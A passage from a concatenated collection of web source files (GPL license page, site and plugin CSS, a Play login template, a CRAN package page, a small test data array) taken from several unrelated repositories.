FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
REPAIR OR CORRECTION.
</p>
<a id="section12"></a><p>
<strong>12.</strong>
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
</p>
<h3>END OF TERMS AND CONDITIONS</h3>
<h3><a id="howto"></a><a id="SEC4">How to Apply These Terms to Your New Programs</a></h3>
<p>
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
</p>
<p>
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
convey the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
</p>
<pre>
<var>one line to give the program's name and an idea of what it does.</var>
Copyright (C) <var>yyyy</var> <var>name of author</var>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
</pre>
<p>
Also add information on how to contact you by electronic and paper mail.
</p>
<p>
If the program is interactive, make it output a short notice like this
when it starts in an interactive mode:
</p>
<pre>
Gnomovision version 69, Copyright (C) <var>year</var> <var>name of author</var>
Gnomovision comes with ABSOLUTELY NO WARRANTY; for details
type `show w'. This is free software, and you are welcome
to redistribute it under certain conditions; type `show c'
for details.
</pre>
<p>
The hypothetical commands <samp>`show w'</samp> and <samp>`show c'</samp> should show
the appropriate parts of the General Public License. Of course, the
commands you use may be called something other than <samp>`show w'</samp> and
<samp>`show c'</samp>; they could even be mouse-clicks or menu items--whatever
suits your program.
</p>
<p>
You should also get your employer (if you work as a programmer) or your
school, if any, to sign a "copyright disclaimer" for the program, if
necessary. Here is a sample; alter the names:
</p>
<pre>
Yoyodyne, Inc., hereby disclaims all copyright
interest in the program `Gnomovision'
(which makes passes at compilers) written
by James Hacker.
<var>signature of Ty Coon</var>, 1 April 1989
Ty Coon, President of Vice
</pre>
<p>
This General Public License does not permit incorporating your program into
proprietary programs. If your program is a subroutine library, you may
consider it more useful to permit linking proprietary applications with the
library. If this is what you want to do, use the
<a href="http://www.gnu.org/licenses/lgpl.html">GNU Lesser General Public License</a>
instead of this License.
</p>
</body>
</html>
|
css/style.css | Rmalnoult/pearlstagram | /**
*@site Pearlstagram
*version du fichier 1.0
*@lastmodified 2013.12.18
*@author Romain Malnoult
*/
body {
margin: auto;
background-color: #999;
font-family: 'Lato', sans-serif;
}
a {
text-decoration: none;
color: inherit;
}
h1 {
text-shadow: #FFF 2px 2px 0px,
#FFF -2px 2px 0px,
#FFF -2px -2px 0px,
#FFF 2px -2px 0px;
font-weight: 900;
float: left;
-webkit-transition: all 0.4s ;
transition: all 0.4s ;
}
h1:hover {
text-shadow: #FFF 2px 2px 10px,
#FFF -2px 2px 10px,
#FFF -2px -2px 10px,
#FFF 2px -2px 10px;
}
header {
padding: 0 100px 20px 100px;
margin: 0 0 20px 0px;
background-color: #333333;
}
header p {
clear: both;
margin-top: 0;
color: #fff;
}
.clear {
clear: both;
}
#tags {
padding: 0 100px;
height: auto;
width: 600px;
}
#tags a {
text-transform: uppercase;
color: #444;
text-decoration: none;
padding: 20px 20px;
font-weight: bold;
-webkit-transition: all 0.8s;
transition: all 0.8s;
background-color:#333333;
display:inline-block;
cursor:pointer;
text-decoration:none;
color: #fff;
}
#tags a:active, #tags a:focus, #tags a:hover {
background-color: #019875;
color: #eee;
}
input {
height: 40px;
width: 200px;
margin: 30px 0px 0 0;
border: none;
float: right;
}
input:active, input:focus, input:hover {
-webkit-box-shadow: 3px 3px 3px 1px rgba(0,0,0,0.4);
box-shadow: 3px 3px 3px 1px rgba(0,0,0,0.4);
}
.go {
height: 42px;
width: 50px;
background-image: url('../ico/search.png');
background-repeat: no-repeat;
background-position: 12px 7px;
margin-left: -3px;
-webkit-transition: all 0.3s;
transition: all 0.3s;
}
.go:active, .go:focus, .go:hover {
-webkit-box-shadow: 3px 3px 3px 1px rgba(0,0,0,0.4);
box-shadow: 3px 3px 3px 1px rgba(0,0,0,0.4);
}
#image {
position: relative;
margin: 0 100px;
float: right;
}
#image img {
width: 400px;
height: auto;
border: 30px solid #eee;
border-bottom: 90px solid #eee;
-webkit-box-shadow: 0px 5px 5px 5px rgba(0,0,0,0.4);
box-shadow: 0px 5px 5px 5px rgba(0,0,0,0.4);
}
#image p {
float: right;
left: 30px;
position: absolute;
bottom: 10px;
max-width: 350px;
max-height: 40px;
overflow: hidden;
}
#tags {
height: auto;
width: 580px;
}
#tags ul {
margin: 0;
padding: 0;
}
#tags li {
display: inline-block;
list-style-type: none;
margin: 5px 5px;
padding: 20px 20px;
}
footer p {
position: relative;
bottom: 0px;
left: 150px;
color: #888888;
font-size: 11px;
line-height: 15px;
text-align: center;
} |
app/org/iatoki/judgels/sealtiel/account/loginView.scala.html | judgels/sealtiel | @import org.iatoki.judgels.sealtiel.account.LoginForm
@import play.i18n.Messages
@import org.iatoki.judgels.play.views.html.formErrorView
@import org.iatoki.judgels.sealtiel.account.routes
@(form: Form[LoginForm])
@implicitFieldConstructor = @{ b3.horizontal.fieldConstructor("col-md-3", "col-md-9") }
<div class="row login-content">
<div class="col-md-12">
@formErrorView(form)
@b3.form(routes.AccountController.postLogin()) {
@helper.CSRF.formField
@b3.text(form("username"), '_label -> Messages.get("auth.field.username"))
@b3.password(form("password"), '_label -> Messages.get("auth.field.password"))
@b3.submit('class -> "btn btn-primary") { @Messages.get("commons.auth.button.logIn") }
}
</div>
</div> |
sites/all/modules/ctools/help/context-access.html | djredhand/jd_test |
access plugins allow context based access control to pages.
'title' => Title of the plugin
'description' => Description of the plugin
'callback' => callback to see if there is access is available. params: $conf, $contexts, $account
'required context' => zero or more required contexts for this access plugin
'default' => an array of defaults or a callback giving defaults
'settings form' => settings form. params: &$form, &$form_state, $conf
settings form validate
settings form submit
warning: Your settings array will be stored IN THE MENU SYSTEM to reduce loads, so be TRIM.
|
Code/GetMetaDataFromCRAN/raw_html/hmmm.html | esander91/NamespacePollution | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CRAN - Package hmmm</title>
<link rel="stylesheet" type="text/css" href="../../CRAN_web.css" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
table td { vertical-align: top; }
</style>
</head>
<body>
<h2>hmmm: hierarchical multinomial marginal models</h2>
<p>Functions for specifying and fitting marginal models for contingency tables proposed
by Bergsma and Rudas (2002) here called hierarchical multinomial marginal models (hmmm) and their extensions presented by Bartolucci et al.
(2007); multinomial Poisson homogeneous (mph) models and homogeneous linear predictor (hlp) models for contingency
tables proposed by Lang (2004) and (2005); hidden Markov models where the distribution of the observed variables
is described by a marginal model.
Inequality constraints on the parameters are allowed and can be tested.</p>
<table summary="Package hmmm summary">
<tr>
<td>Version:</td>
<td>1.0-3</td>
</tr>
<tr>
<td>Imports:</td>
<td><a href="../quadprog/index.html">quadprog</a>, <a href="../MASS/index.html">MASS</a>, <a href="../mvtnorm/index.html">mvtnorm</a></td>
</tr>
<tr>
<td>Published:</td>
<td>2014-08-14</td>
</tr>
<tr>
<td>Author:</td>
<td>Colombi Roberto and Sabrina Giordano and Manuela Cazzaro, with contributions from Joseph Lang</td>
</tr>
<tr>
<td>Maintainer:</td>
<td>Colombi Roberto <colombi at unibg.it></td>
</tr>
<tr>
<td>License:</td>
<td><a href="../../licenses/GPL-2">GPL-2</a> | <a href="../../licenses/GPL-3">GPL-3</a> [expanded from: GPL (≥ 2)]</td>
</tr>
<tr>
<td>URL:</td>
<td><a href="http://www.r-project.org">http://www.r-project.org</a></td>
</tr>
<tr>
<td>NeedsCompilation:</td>
<td>no</td>
</tr>
<tr>
<td>Citation:</td>
<td><a href="citation.html">hmmm citation info</a> </td>
</tr>
<tr>
<td>Materials:</td>
<td><a href="NEWS">NEWS</a> </td>
</tr>
<tr>
<td>CRAN checks:</td>
<td><a href="../../checks/check_results_hmmm.html">hmmm results</a></td>
</tr>
</table>
<h4>Downloads:</h4>
<table summary="Package hmmm downloads">
<tr>
<td> Reference manual: </td>
<td> <a href="hmmm.pdf"> hmmm.pdf </a> </td>
</tr>
<tr>
<td>Vignettes:</td>
<td>
<a href="vignettes/tutorial.pdf">hmmm</a><br/>
</td>
</tr>
<tr>
<td> Package source: </td>
<td> <a href="../../../src/contrib/hmmm_1.0-3.tar.gz"> hmmm_1.0-3.tar.gz </a> </td>
</tr>
<tr>
<td> Windows binaries: </td>
<td> r-devel: <a href="../../../bin/windows/contrib/3.5/hmmm_1.0-3.zip">hmmm_1.0-3.zip</a>, r-release: <a href="../../../bin/windows/contrib/3.4/hmmm_1.0-3.zip">hmmm_1.0-3.zip</a>, r-oldrel: <a href="../../../bin/windows/contrib/3.3/hmmm_1.0-3.zip">hmmm_1.0-3.zip</a> </td>
</tr>
<tr>
<td> OS X El Capitan binaries: </td>
<td> r-release: <a href="../../../bin/macosx/el-capitan/contrib/3.4/hmmm_1.0-3.tgz">hmmm_1.0-3.tgz</a> </td>
</tr>
<tr>
<td> OS X Mavericks binaries: </td>
<td> r-oldrel: <a href="../../../bin/macosx/mavericks/contrib/3.3/hmmm_1.0-3.tgz">hmmm_1.0-3.tgz</a> </td>
</tr>
<tr>
<td> Old sources: </td>
<td> <a href="../../../src/contrib/Archive/hmmm"> hmmm archive </a> </td>
</tr>
</table>
<h4>Linking:</h4>
<p>Please use the canonical form
<a href="https://CRAN.R-project.org/package=hmmm"><samp>https://CRAN.R-project.org/package=hmmm</samp></a>
to link to this page.</p>
</body>
</html>
|
wp-content/themes/swift/admin/custom-editor-style.css | jdickie/Portfolio | @charset "UTF-8";
/* CSS Document */
.grid_1,.grid_2,.grid_3,.grid_4,.grid_5,.grid_6,.grid_7,.grid_8,.grid_9,.grid_10,.grid_11,.grid_12,.grid_13,.grid_14,.grid_15,.grid_16 {display: inline;float: left;margin-left: 10px;margin-right: 10px;border:dashed 1px #CCC}
.grid_1 {width: 40px;}
.grid_2 {width: 100px;}
.grid_3 {width: 160px;}
.grid_4 {width: 220px;}
.grid_5 {width: 280px;}
.grid_6 {width: 340px;}
.grid_7 {width: 400px;}
.grid_8 {width: 460px;}
.grid_9 {width: 520px;}
.grid_10 {width: 580px;}
.grid_11 {width: 640px;}
.grid_13 {width: 760px;}
.grid_14 {width: 820px;}
.grid_15 {width: 880px;}
.grid_16 {width: 940px;}
div.clear{clear:both;padding:5px 0; display:block;}
blockquote{
font-size:1.2em;line-height:1.25em; font-style:italic; background:url('../images/blockquote-bg.png') no-repeat 5px 1.2533em; margin-bottom:1.25em;padding:1.2333em 1em .0167em 45px; width:85%;-moz-border-radius: 10px;
-webkit-border-radius: 10px;}
blockquote p{margin-bottom:1.25em}
p.bg{display:none}
.note{background:#fffcc7 url('note.png') no-repeat 5px 50%;padding:10px 0 10px 42px;border:dashed 1px #f8aa00;display:block}
.warning{background:#fbd75b url('warning.png') no-repeat 5px 50%;padding:10px 0 10px 42px;border:dashed 1px red;display:block}
.tip{background:#dff2fc url('tip.png') no-repeat 5px 50%;padding:10px 0 10px 42px;border:dashed 1px #21b7e8;display:block}
.question{background:#EEE url('question.png') no-repeat 5px 50%;padding:10px 0 10px 42px;border:dashed 1px #CCC;display:block}
.download{background:#25b3e3 url('download.png') no-repeat 5px 50%;padding:10px 15px 10px 60px;border:solid 2px #EEE;display:inline-block;margin-bottom:.75em;
font-size:2em;line-height:1.5em;
-moz-border-radius: 30px;
-webkit-border-radius: 30px;
}
.button{
background:#25b3e3; border:solid 2px #EEE;font-size:2em;line-height:1.5em;
-moz-border-radius: 20px; display:inline-block;
-webkit-border-radius: 20px;line-height:1.5em;
padding:8px; margin-bottom:.75em; }
.download a,.button a{text-decoration:none;color:#EEE;}
.note,.warning,.tip,.question{font-size:1.3em;line-height:1.153846153846154em;margin-bottom:1.153846153846154em}
ul li{list-style:square;margin-bottom:1.5em}
ul.tick li{list-style:none; background:url(tick.png) no-repeat left;padding-left:30px;margin-left:0;}
ul.arrow li{list-style:none; background:url(arrow.png) no-repeat left;padding-left:28px;margin-left:0;} |
tests/data/en_GB/test_bw_email__syntax.html | bobbingwide/oik | Array
(
[prefix] => Array
(
[default] => Email
[values] => <i>string</i>
[notes] => Prefix string
)
[sep] => Array
(
[default] => :
[values] => <i>string</i>
[notes] => Separator string
)
[alt] => Array
(
[default] =>
[values] => 1
[notes] => Use alternative value
)
[title] => Array
(
[default] => Send email to:
[values] => <i>title string</i>
[notes] => Tool tip text
)
[tag] => Array
(
[default] => span
[values] => <i>tag</i>
[notes] => enclosing HTML tag
)
[index] => Array
(
[default] => email
[values] => <i>field</i>
[notes] => oik options field to use
)
)
|
wp-content/themes/cutting-edge/framework/assets/css/spyropress.plugins.css | jamesshannonwd/meesha | .ui-colorpicker,
.ui-dialog.ui-colorpicker {
width: auto;
white-space: nowrap;
-webkit-touch-callout: none;
-webkit-user-select: none;
-khtml-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
z-index: 999999 !important;
}
.ui-colorpicker-inline {
position: static;
}
.ui-colorpicker-buttonset {
float: left;
margin-left: .4em;
}
.ui-colorpicker-buttonset .ui-button {
margin: .5em 0 .5em 0;
cursor: pointer;
}
.ui-colorpicker-buttonpane {
background-image: none;
margin: .7em 0 0 0;
padding: 0 .2em;
border-left: 0;
border-right: 0;
border-bottom: 0;
}
.ui-colorpicker-buttonpane button {
float: right;
margin: .5em .2em .4em;
cursor: pointer;
padding: .2em .6em .3em .6em;
width: auto;
overflow: visible;
}
.ui-colorpicker-buttonpane button.ui-colorpicker-current {
float: left;
}
.ui-colorpicker table {
font-size: 100%; /* Reset browser table font-size */
margin: 0;
}
.ui-colorpicker table td {
vertical-align: top;
}
.ui-colorpicker-padding-left {
padding-left: 10px;
}
.ui-colorpicker-padding-top {
padding-top: 10px;
}
.ui-colorpicker-border {
border: 1px inset;
display: inline-block;
}
/* Bar & map */
.ui-colorpicker-map > *,
.ui-colorpicker-bar > * {
position: absolute;
cursor: crosshair;
}
.ui-colorpicker-map-pointer,
.ui-colorpicker-bar-pointer {
position: absolute;
}
/* Map */
.ui-colorpicker-map,
.ui-colorpicker-map > * {
display: block;
width: 256px;
height: 256px;
overflow: hidden;
}
.ui-colorpicker-map-layer-1,
.ui-colorpicker-map-layer-2 {
background: url(../img/colorpicker/map.png) no-repeat;
}
.ui-colorpicker-map-layer-alpha {
background: url(../img/colorpicker/map-opacity.png);
}
.ui-colorpicker-map-pointer {
display: inline-block;
width: 15px;
height: 15px;
background: url(../img/colorpicker/map-pointer.png) no-repeat;
}
/* Bar */
.ui-colorpicker-bar,
.ui-colorpicker-bar > * {
display: block;
width: 20px;
height: 256px;
overflow: hidden;
background-repeat: repeat-x;
}
.ui-colorpicker-bar-layer-1,
.ui-colorpicker-bar-layer-2,
.ui-colorpicker-bar-layer-3,
.ui-colorpicker-bar-layer-4 {
background: url(../img/colorpicker/bar.png) repeat-x;
}
.ui-colorpicker-bar-layer-alpha {
background: url(../img/colorpicker/bar-opacity.png);
}
.ui-colorpicker-bar-layer-alphabar {
background: url(../img/colorpicker/bar-alpha.png);
}
.ui-colorpicker-bar-pointer {
display: inline-block;
width: 20px;
height: 7px;
background: url(../img/colorpicker/bar-pointer.png) no-repeat;
}
/* Preview */
.ui-colorpicker-preview {
text-align: center;
}
.ui-colorpicker-preview-initial {
cursor: pointer;
}
.ui-colorpicker-preview-initial,
.ui-colorpicker-preview-current {
width: 50px;
height: 20px;
display: inline-block;
}
.ui-colorpicker-preview-initial-alpha,
.ui-colorpicker-preview-current-alpha {
width: 50px;
height: 20px;
display: inline-block;
background: url(../img/colorpicker/preview-opacity.png) repeat;
}
/* Inputs */
.ui-colorpicker-rgb label,
.ui-colorpicker-hsv label,
.ui-colorpicker-hsl label,
.ui-colorpicker-lab label,
.ui-colorpicker-cmyk label,
.ui-colorpicker-alpha label {
width: 1.5em;
display: inline-block;
}
.ui-colorpicker-number {
margin: .1em;
width: 4em;
}
/* Hex */
.ui-colorpicker-hex {
text-align: center;
}
/* Swatches */
.ui-colorpicker-swatches {
width: 84px;
height: 256px;
overflow: auto;
background-color: #f8f8f8;
}
.ui-colorpicker-swatch {
cursor: pointer;
float: left;
width: 11px;
height: 11px;
border-right: 1px solid black;
border-bottom: 1px solid black;
}
/* CHOSEN */
/* @group Base */
.chosen-container {
position: relative;
display: inline-block;
vertical-align: middle;
font-size: 13px;
zoom: 1;
*display: inline;
-webkit-user-select: none;
-moz-user-select: none;
user-select: none;
}
.chosen-container .chosen-drop {
position: absolute;
top: 100%;
left: -9999px;
z-index: 1010;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
width: 100%;
border: 1px solid #aaa;
border-top: 0;
background: #fff;
box-shadow: 0 4px 5px rgba(0, 0, 0, 0.15);
}
.chosen-container.chosen-with-drop .chosen-drop {
left: 0;
}
.chosen-container a {
cursor: pointer;
}
/* @end */
/* @group Single Chosen */
.chosen-container-single .chosen-single {
position: relative;
display: block;
overflow: hidden;
padding: 0 0 0 8px;
height: 23px;
border: 1px solid #aaa;
border-radius: 5px;
background-color: #fff;
background: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(20%, #ffffff), color-stop(50%, #f6f6f6), color-stop(52%, #eeeeee), color-stop(100%, #f4f4f4));
background: -webkit-linear-gradient(top, #ffffff 20%, #f6f6f6 50%, #eeeeee 52%, #f4f4f4 100%);
background: -moz-linear-gradient(top, #ffffff 20%, #f6f6f6 50%, #eeeeee 52%, #f4f4f4 100%);
background: -o-linear-gradient(top, #ffffff 20%, #f6f6f6 50%, #eeeeee 52%, #f4f4f4 100%);
background: linear-gradient(top, #ffffff 20%, #f6f6f6 50%, #eeeeee 52%, #f4f4f4 100%);
background-clip: padding-box;
box-shadow: 0 0 3px white inset, 0 1px 1px rgba(0, 0, 0, 0.1);
color: #444;
text-decoration: none;
white-space: nowrap;
line-height: 24px;
}
.chosen-container-single .chosen-default {
color: #999;
}
.chosen-container-single .chosen-single span {
display: block;
overflow: hidden;
margin-right: 26px;
text-overflow: ellipsis;
white-space: nowrap;
}
.chosen-container-single .chosen-single-with-deselect span {
margin-right: 38px;
}
.chosen-container-single .chosen-single abbr {
position: absolute;
top: 6px;
right: 26px;
display: block;
width: 12px;
height: 12px;
background: url(../img/chosen-sprite.png) -42px 1px no-repeat;
font-size: 1px;
}
.chosen-container-single .chosen-single abbr:hover {
background-position: -42px -10px;
}
.chosen-container-single.chosen-disabled .chosen-single abbr:hover {
background-position: -42px -10px;
}
.chosen-container-single .chosen-single div {
position: absolute;
top: 0;
right: 0;
display: block;
width: 18px;
height: 100%;
}
.chosen-container-single .chosen-single div b {
display: block;
width: 100%;
height: 100%;
background: url(../img/chosen-sprite.png) no-repeat 0px 2px;
}
.chosen-container-single .chosen-search {
position: relative;
z-index: 1010;
margin: 0;
padding: 3px 4px;
white-space: nowrap;
}
.chosen-container-single .chosen-search input[type="text"] {
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
margin: 1px 0;
padding: 4px 20px 4px 5px;
width: 100%;
height: auto;
outline: 0;
border: 1px solid #aaa;
background: white url(../img/chosen-sprite.png) no-repeat 100% -20px;
background: url(../img/chosen-sprite.png) no-repeat 100% -20px, -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(1%, #eeeeee), color-stop(15%, #ffffff));
background: url(../img/chosen-sprite.png) no-repeat 100% -20px, -webkit-linear-gradient(#eeeeee 1%, #ffffff 15%);
background: url(../img/chosen-sprite.png) no-repeat 100% -20px, -moz-linear-gradient(#eeeeee 1%, #ffffff 15%);
background: url(../img/chosen-sprite.png) no-repeat 100% -20px, -o-linear-gradient(#eeeeee 1%, #ffffff 15%);
background: url(../img/chosen-sprite.png) no-repeat 100% -20px, linear-gradient(#eeeeee 1%, #ffffff 15%);
font-size: 1em;
font-family: sans-serif;
line-height: normal;
border-radius: 0;
}
.chosen-container-single .chosen-drop {
margin-top: -1px;
border-radius: 0 0 4px 4px;
background-clip: padding-box;
}
.chosen-container-single.chosen-container-single-nosearch .chosen-search {
position: absolute;
left: -9999px;
}
/* @end */
/* @group Results */
.chosen-container .chosen-results {
position: relative;
overflow-x: hidden;
overflow-y: auto;
margin: 0 4px 4px 0;
padding: 0 0 0 4px;
max-height: 240px;
-webkit-overflow-scrolling: touch;
}
.chosen-container .chosen-results li {
display: none;
margin: 0;
padding: 5px 6px;
list-style: none;
line-height: 15px;
}
.chosen-container .chosen-results li.active-result {
display: list-item;
cursor: pointer;
}
.chosen-container .chosen-results li.disabled-result {
display: list-item;
color: #ccc;
cursor: default;
}
.chosen-container .chosen-results li.highlighted {
background-color: #3875d7;
background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(20%, #3875d7), color-stop(90%, #2a62bc));
background-image: -webkit-linear-gradient(#3875d7 20%, #2a62bc 90%);
background-image: -moz-linear-gradient(#3875d7 20%, #2a62bc 90%);
background-image: -o-linear-gradient(#3875d7 20%, #2a62bc 90%);
background-image: linear-gradient(#3875d7 20%, #2a62bc 90%);
color: #fff;
}
.chosen-container .chosen-results li.no-results {
display: list-item;
background: #f4f4f4;
}
.chosen-container .chosen-results li.group-result {
display: list-item;
font-weight: bold;
cursor: default;
}
.chosen-container .chosen-results li.group-option {
padding-left: 15px;
}
.chosen-container .chosen-results li em {
font-style: normal;
text-decoration: underline;
}
/* @end */
/* @group Multi Chosen */
.chosen-container-multi .chosen-choices {
position: relative;
overflow: hidden;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
margin: 0;
padding: 0;
width: 100%;
height: auto !important;
height: 1%;
border: 1px solid #aaa;
background-color: #fff;
background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(1%, #eeeeee), color-stop(15%, #ffffff));
background-image: -webkit-linear-gradient(#eeeeee 1%, #ffffff 15%);
background-image: -moz-linear-gradient(#eeeeee 1%, #ffffff 15%);
background-image: -o-linear-gradient(#eeeeee 1%, #ffffff 15%);
background-image: linear-gradient(#eeeeee 1%, #ffffff 15%);
cursor: text;
}
.chosen-container-multi .chosen-choices li {
float: left;
list-style: none;
}
.chosen-container-multi .chosen-choices li.search-field {
margin: 0;
padding: 0;
white-space: nowrap;
}
.chosen-container-multi .chosen-choices li.search-field input[type="text"] {
margin: 1px 0;
padding: 5px;
height: 15px;
outline: 0;
border: 0 !important;
background: transparent !important;
box-shadow: none;
color: #666;
font-size: 100%;
font-family: sans-serif;
line-height: normal;
border-radius: 0;
}
.chosen-container-multi .chosen-choices li.search-field .default {
color: #999;
}
.chosen-container-multi .chosen-choices li.search-choice {
position: relative;
margin: 3px 0 3px 5px;
padding: 3px 20px 3px 5px;
border: 1px solid #aaa;
border-radius: 3px;
background-color: #e4e4e4;
background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(20%, #f4f4f4), color-stop(50%, #f0f0f0), color-stop(52%, #e8e8e8), color-stop(100%, #eeeeee));
background-image: -webkit-linear-gradient(#f4f4f4 20%, #f0f0f0 50%, #e8e8e8 52%, #eeeeee 100%);
background-image: -moz-linear-gradient(#f4f4f4 20%, #f0f0f0 50%, #e8e8e8 52%, #eeeeee 100%);
background-image: -o-linear-gradient(#f4f4f4 20%, #f0f0f0 50%, #e8e8e8 52%, #eeeeee 100%);
background-image: linear-gradient(#f4f4f4 20%, #f0f0f0 50%, #e8e8e8 52%, #eeeeee 100%);
background-clip: padding-box;
box-shadow: 0 0 2px white inset, 0 1px 0 rgba(0, 0, 0, 0.05);
color: #333;
line-height: 13px;
cursor: default;
}
.chosen-container-multi .chosen-choices li.search-choice .search-choice-close {
position: absolute;
top: 4px;
right: 3px;
display: block;
width: 12px;
height: 12px;
background: url(../img/chosen-sprite.png) -42px 1px no-repeat;
font-size: 1px;
}
.chosen-container-multi .chosen-choices li.search-choice .search-choice-close:hover {
background-position: -42px -10px;
}
.chosen-container-multi .chosen-choices li.search-choice-disabled {
padding-right: 5px;
border: 1px solid #ccc;
background-color: #e4e4e4;
background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(20%, #f4f4f4), color-stop(50%, #f0f0f0), color-stop(52%, #e8e8e8), color-stop(100%, #eeeeee));
background-image: -webkit-linear-gradient(top, #f4f4f4 20%, #f0f0f0 50%, #e8e8e8 52%, #eeeeee 100%);
background-image: -moz-linear-gradient(top, #f4f4f4 20%, #f0f0f0 50%, #e8e8e8 52%, #eeeeee 100%);
background-image: -o-linear-gradient(top, #f4f4f4 20%, #f0f0f0 50%, #e8e8e8 52%, #eeeeee 100%);
background-image: linear-gradient(top, #f4f4f4 20%, #f0f0f0 50%, #e8e8e8 52%, #eeeeee 100%);
color: #666;
}
.chosen-container-multi .chosen-choices li.search-choice-focus {
background: #d4d4d4;
}
.chosen-container-multi .chosen-choices li.search-choice-focus .search-choice-close {
background-position: -42px -10px;
}
.chosen-container-multi .chosen-results {
margin: 0;
padding: 0;
}
.chosen-container-multi .chosen-drop .result-selected {
display: list-item;
color: #ccc;
cursor: default;
}
/* @end */
/* @group Active */
.chosen-container-active .chosen-single {
border: 1px solid #5897fb;
box-shadow: 0 0 5px rgba(0, 0, 0, 0.3);
}
.chosen-container-active.chosen-with-drop .chosen-single {
border: 1px solid #aaa;
-moz-border-radius-bottomright: 0;
border-bottom-right-radius: 0;
-moz-border-radius-bottomleft: 0;
border-bottom-left-radius: 0;
background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(20%, #eeeeee), color-stop(80%, #ffffff));
background-image: -webkit-linear-gradient(#eeeeee 20%, #ffffff 80%);
background-image: -moz-linear-gradient(#eeeeee 20%, #ffffff 80%);
background-image: -o-linear-gradient(#eeeeee 20%, #ffffff 80%);
background-image: linear-gradient(#eeeeee 20%, #ffffff 80%);
box-shadow: 0 1px 0 #fff inset;
}
.chosen-container-active.chosen-with-drop .chosen-single div {
border-left: none;
background: transparent;
}
.chosen-container-active.chosen-with-drop .chosen-single div b {
background-position: -18px 2px;
}
.chosen-container-active .chosen-choices {
border: 1px solid #5897fb;
box-shadow: 0 0 5px rgba(0, 0, 0, 0.3);
}
.chosen-container-active .chosen-choices li.search-field input[type="text"] {
color: #111 !important;
}
/* @end */
/* @group Disabled Support */
.chosen-disabled {
opacity: 0.5 !important;
cursor: default;
}
.chosen-disabled .chosen-single {
cursor: default;
}
.chosen-disabled .chosen-choices .search-choice .search-choice-close {
cursor: default;
}
/* @end */
/* @group Right to Left */
.chosen-rtl {
text-align: right;
}
.chosen-rtl .chosen-single {
overflow: visible;
padding: 0 8px 0 0;
}
.chosen-rtl .chosen-single span {
margin-right: 0;
margin-left: 26px;
direction: rtl;
}
.chosen-rtl .chosen-single-with-deselect span {
margin-left: 38px;
}
.chosen-rtl .chosen-single div {
right: auto;
left: 3px;
}
.chosen-rtl .chosen-single abbr {
right: auto;
left: 26px;
}
.chosen-rtl .chosen-choices li {
float: right;
}
.chosen-rtl .chosen-choices li.search-field input[type="text"] {
direction: rtl;
}
.chosen-rtl .chosen-choices li.search-choice {
margin: 3px 5px 3px 0;
padding: 3px 5px 3px 19px;
}
.chosen-rtl .chosen-choices li.search-choice .search-choice-close {
right: auto;
left: 4px;
}
.chosen-rtl.chosen-container-single-nosearch .chosen-search,
.chosen-rtl .chosen-drop {
left: 9999px;
}
.chosen-rtl.chosen-container-single .chosen-results {
margin: 0 0 4px 4px;
padding: 0 4px 0 0;
}
.chosen-rtl .chosen-results li.group-option {
padding-right: 15px;
padding-left: 0;
}
.chosen-rtl.chosen-container-active.chosen-with-drop .chosen-single div {
border-right: none;
}
.chosen-rtl .chosen-search input[type="text"] {
padding: 4px 5px 4px 20px;
background: white url(../img/chosen-sprite.png) no-repeat -30px -20px;
background: url(../img/chosen-sprite.png) no-repeat -30px -20px, -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(1%, #eeeeee), color-stop(15%, #ffffff));
